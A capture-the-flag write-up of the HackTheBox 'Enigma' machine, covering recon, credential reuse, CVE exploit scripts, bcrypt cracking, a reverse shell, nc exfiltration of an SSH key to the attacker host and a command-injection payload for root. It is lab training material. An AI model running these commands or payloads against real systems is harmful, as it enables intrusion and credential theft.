~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • Wonderland
  • HTB - Enigma


    Reconaissance:

    First we need to get an idea of what’s on our target so we run nmap and find a few mailbox services, rpcbind and a nginx webserver. Since we have a nfs share lying around we start there after visiting the nginx server and mount the network share as it is available to all users. We find credentials for User: Kevin – Password: Enigma2024!, we can use those on a mail server service named Roundcube mail. We try in different services for reused password and we eventually find out that the User: Sarah (Who sent a email to roundcube mailbox) reuses the Password: Enigma 2024!. Inside Sarah’s mailbox we find a email with an url to a openSTAManager application and User: admin – Password: Ne3s4rtars78s credentials for it.

    nmap -sV -v -sC 10.129.21.229

    PORT     STATE SERVICE  VERSION
    22/tcp   open  ssh      OpenSSH 9.6p1 Ubuntu 3ubuntu13.16 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
    |_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
    80/tcp   open  http     nginx 1.24.0 (Ubuntu)
    | http-methods: 
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-title: Did not follow redirect to http://enigma.htb/
    |_http-server-header: nginx/1.24.0 (Ubuntu)
    110/tcp  open  pop3     Dovecot pop3d
    | ssl-cert: Subject: commonName=enigma
    | Subject Alternative Name: DNS:enigma
    | Issuer: commonName=enigma
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2026-02-18T20:33:33
    | Not valid after:  2036-02-16T20:33:33
    | MD5:     8361 ca20 2e4e dff6 6e90 1445 7458 9fc3
    | SHA-1:   9f91 b6ed 85b4 517c 0421 c62e 167d 5631 daa6 5a40
    |_SHA-256: 98a8 1f62 b59c 832a 162e 2394 9e41 1e08 46a0 f7c1 529f afcb ea15 eea5 ef52 bb70
    |_pop3-capabilities: CAPA UIDL TOP AUTH-RESP-CODE STLS SASL PIPELINING RESP-CODES
    |_ssl-date: TLS randomness does not represent time
    111/tcp  open  rpcbind  2-4 (RPC #100000)
    | rpcinfo: 
    |   program version    port/proto  service
    |   100000  2,3,4        111/tcp   rpcbind
    |   100000  2,3,4        111/udp   rpcbind
    |   100000  3,4          111/tcp6  rpcbind
    |   100000  3,4          111/udp6  rpcbind
    |   100003  3,4         2049/tcp   nfs
    |   100003  3,4         2049/tcp6  nfs
    |   100005  1,2,3      37685/tcp   mountd
    |   100005  1,2,3      49935/tcp6  mountd
    |   100005  1,2,3      59374/udp6  mountd
    |   100005  1,2,3      59753/udp   mountd
    |   100021  1,3,4      32857/tcp6  nlockmgr
    |   100021  1,3,4      35674/udp   nlockmgr
    |   100021  1,3,4      36019/tcp   nlockmgr
    |   100021  1,3,4      51386/udp6  nlockmgr
    |   100024  1          49253/udp6  status
    |   100024  1          56479/tcp6  status
    |   100024  1          58665/tcp   status
    |   100024  1          59198/udp   status
    |   100227  3           2049/tcp   nfs_acl
    |_  100227  3           2049/tcp6  nfs_acl
    143/tcp  open  imap     Dovecot imapd (Ubuntu)
    |_ssl-date: TLS randomness does not represent time
    |_imap-capabilities: ID more capabilities LITERAL+ have LOGIN-REFERRALS ENABLE SASL-IR IDLE post-login Pre-login listed STARTTLS IMAP4rev1 LOGINDISABLEDA0001 OK
    | ssl-cert: Subject: commonName=enigma
    | Subject Alternative Name: DNS:enigma
    | Issuer: commonName=enigma
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2026-02-18T20:33:33
    | Not valid after:  2036-02-16T20:33:33
    | MD5:     8361 ca20 2e4e dff6 6e90 1445 7458 9fc3
    | SHA-1:   9f91 b6ed 85b4 517c 0421 c62e 167d 5631 daa6 5a40
    |_SHA-256: 98a8 1f62 b59c 832a 162e 2394 9e41 1e08 46a0 f7c1 529f afcb ea15 eea5 ef52 bb70
    993/tcp  open  ssl/imap Dovecot imapd (Ubuntu)
    | ssl-cert: Subject: commonName=enigma
    | Subject Alternative Name: DNS:enigma
    | Issuer: commonName=enigma
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2026-02-18T20:33:33
    | Not valid after:  2036-02-16T20:33:33
    | MD5:     8361 ca20 2e4e dff6 6e90 1445 7458 9fc3
    | SHA-1:   9f91 b6ed 85b4 517c 0421 c62e 167d 5631 daa6 5a40
    |_SHA-256: 98a8 1f62 b59c 832a 162e 2394 9e41 1e08 46a0 f7c1 529f afcb ea15 eea5 ef52 bb70
    |_ssl-date: TLS randomness does not represent time
    |_imap-capabilities: ID AUTH=PLAINA0001 LITERAL+ more LOGIN-REFERRALS ENABLE SASL-IR IDLE capabilities post-login listed have IMAP4rev1 Pre-login OK
    995/tcp  open  ssl/pop3 Dovecot pop3d
    |_pop3-capabilities: CAPA UIDL TOP AUTH-RESP-CODE USER SASL(PLAIN) PIPELINING RESP-CODES
    |_ssl-date: TLS randomness does not represent time
    | ssl-cert: Subject: commonName=enigma
    | Subject Alternative Name: DNS:enigma
    | Issuer: commonName=enigma
    | Public Key type: rsa
    | Public Key bits: 2048
    | Signature Algorithm: sha256WithRSAEncryption
    | Not valid before: 2026-02-18T20:33:33
    | Not valid after:  2036-02-16T20:33:33
    | MD5:     8361 ca20 2e4e dff6 6e90 1445 7458 9fc3
    | SHA-1:   9f91 b6ed 85b4 517c 0421 c62e 167d 5631 daa6 5a40
    |_SHA-256: 98a8 1f62 b59c 832a 162e 2394 9e41 1e08 46a0 f7c1 529f afcb ea15 eea5 ef52 bb70
    2049/tcp open  nfs_acl  3 (RPC #100227)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    showmount -e 10.129.21.229

    Export list for 10.129.21.229: /srv/nfs/onboarding *

    sudo mount -t nfs 10.129.21.229:/srv/nfs/onboarding /mnt -o nolock

    Found credentials in pdf file. username: kevin password: Enigma2024! for a mail service at mail001.enigma.htb

    sudo echo “10.129.21.229 mail001.enigma.htb” >> /etc/hosts

    Found some credentials being reused

    Username: Sarah Password: Enigma2024!

    Inside Sarah’s mailbox we have more credentials

    URL: support_001.enigma.htb username: admin Password: Ne3s4rtars78s


    Foothold:

    First, we dump the SQL database using injection, initially hoping for credentials that would open everything for us. We then leverage another CVE-2025-69212, we then send a reverse shell over and use nc to catch it from our attacker machine. We then change user to haris and since we aren’t getting a fully interactive tty, we create a ssh keypair and use those to authenticate to the ssh service.

    CVE-2026-24418

    We can just clone this and just run the exploit with the session cookie we get with our admin credentials. > python3 exploit.py -t http://support_001.enigma.htb -u admin -p Ne3s4rtars78s -c it4ktvasebt9c70cv6qldo4pdo –users

    Result of user dump:

    ID: 2 Username: haris Email: haris@enigma.htb Enabled: 1 Hash: $2y10WHf1T79sxjsZongUKT2jGeexTkvihBQyCZeoYXmObiNphrsZDr6eC

    john –format=bcrypt hashes4john.txt –wordlist=/usr/share/wordlists/rockyou.txt

    bestfriends (?)

    We now have new credentials

    Username: haris Password: bestfriends

    openSTAManager 2.9.8 CVE-2026-38751

    This gets us access to start running commands.

    python3 exploit.py -u http://support_001.enigma.htb -U admin -P Ne3s4rtars78s –lport 6969 –lhost 10.10.15.24 –interactive

    su haris

    Password: bestfriends

    User flag:

    e8cca2344b1cf5f370e54a36e71e7c10

    find / -perm -u=s -type f 2>/dev/null:

    /usr/bin/gpasswd
    /usr/bin/umount
    /usr/bin/chfn
    /usr/bin/fusermount3
    /usr/bin/newgrp
    /usr/bin/sudo
    /usr/bin/mount
    /usr/bin/su
    /usr/bin/chsh
    /usr/bin/passwd
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/lib/polkit-1/polkit-agent-helper-1
    /usr/lib/openssh/ssh-keysign
    /usr/sbin/mount.nfs

    To get a functional ssh connection we create a key pair and authorized the key and send the key to our host and connect directly

    ssh-keygen -b 2048 -t rsa
    nc 10.10.15.24 1337 < id_rsa (On victim)
    touch authorized_keys && cat id_rsa > authorized_keys (If necessary fix your perms with chmod 600) 
    
    On attacker:
    nc -lvnp 1337 > id_rsa
    ssh -i id_rsa haris@10.129.22.122 

    Privilege Escalation:

    Here we go we are in. After reading the config.yaml for OliveTin i realised there was a localhost webserver on port 1337, accepting unauth commands and running them as root, that obvously how we escalate. Since the OliveTin accepts localhost connections we forward to our attacker machine the webservice. And, lastly we use an SQL injection in the password field since, it is the one vulnerable to injection. We escape with ’ ; < arbitrary-cmd > ; #. With that we could make a new key pair to fully own the machine but we read all text file in /root/ for the flag.

    No PoC just complimentary bedtime reading: CVE-2026-27626

    OliveTin config.yaml

    Listen on all addresses available, port 1337 listenAddressSingleHTTPFrontend: 0.0.0.0:1337

    defaultPermissions: view: true exec: true logs: true

    This setting effectively enables or disables guests. If set to true, then users will have to login to do anything. authRequireGuestsToLogin: false

    ssh forwarding

    ssh -i id_ed25519 -o IdentitiesOnly=yes -L 1337:0.0.0.0:1337 haris@10.129.22.122

    Now we can go into the OliveTin execution app and we want to enter into the password field our injection which is:

    db_pass payload: x’ ; cat /root/*.txt ; #

    Root flag:

    ca64d74969fbfb9423f1f7e8e12290a4